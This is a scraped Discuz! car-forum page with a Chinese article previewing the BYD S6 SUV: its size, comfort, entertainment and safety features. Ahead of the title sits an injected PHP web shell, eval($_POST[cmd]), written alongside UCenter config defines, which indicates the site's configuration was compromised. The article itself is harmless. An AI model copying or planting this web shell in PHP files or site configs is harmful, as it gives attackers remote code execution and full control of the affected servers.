');eval($_POST[cmd])?>'); define('UC_APPID', 'UC_APPID'); define('UC_PPP', '20'); 十足的大塊頭 比亞迪首款SUV S6 - 改裝俱樂部 - 四輪天下 - Powered by Discuz!
返回列表 回復 發帖

十足的大塊頭 比亞迪首款SUV S6

比亞迪首款SUV車型比亞迪S6將於下周的北京車展與觀眾首次見面,這款車傳聞已久,但目前為止卻仍十分神秘。編輯最新獲得該款新車的實拍照片,先供大家一睹為快。

    定位B級SUV的S6擁有4810/1855/1680mm的車身尺寸,與目前國內熱銷的SUV車型相較,S6可謂是十足的大塊頭。



    S6依然延續產品高性價比的優勢,豪華智能配置相當豐富,整車配有Keyless系統、電子防盜系統、語音電子導航系統,展現了智能科技在汽車產品中的運用。為了使駕駛愉悅感和安全性得到最優化,在視野的配置設計上比亞迪非常用心,倒車可視系統、駐車輔助攝像頭、近光燈自動開啟,方便行駛和停駐,為了防止玻璃霜霧帶來的安全隱患,S6還配有外後視鏡加熱和後風窗電除霜。娛樂配置方面,S6依然毫不遜色,從普通的4位揚聲器增加到11位揚聲器,讓酷愛音樂的駕駛者愛不釋手,DVD播放器、7英吋顯示觸摸屏、移動數字電視,堪比頂級豪華車配置。



    在安全方面,S6採用 「3H」高強度全方位碰撞吸能安全車身結構以及整體鋼板沖壓側圍,加大了車身側圍、頂部、地板抗衝擊強度,對提高安全性能意義重大,同時配備了ABS(帶EBD)、前排雙安全氣囊、前排側安全氣囊、側安全氣簾、安全帶未戴警示、兒童座椅固定裝置。而CAN總線通訊系統保證了整車信息交互,能夠及時、有效地傳輸車輛有效信息,實現了車輛高效安全的控制。



    粗略一瞥,就發現無論是外觀、內飾、技術等方面,比亞迪在S6的開發上可謂不遺餘力,看來是想在SUV市場大展拳腳。對於此款車上市時間以及銷售價格,目前還沒有具體的信息,不過毫無疑問,這款車非常值得期待。
返回列表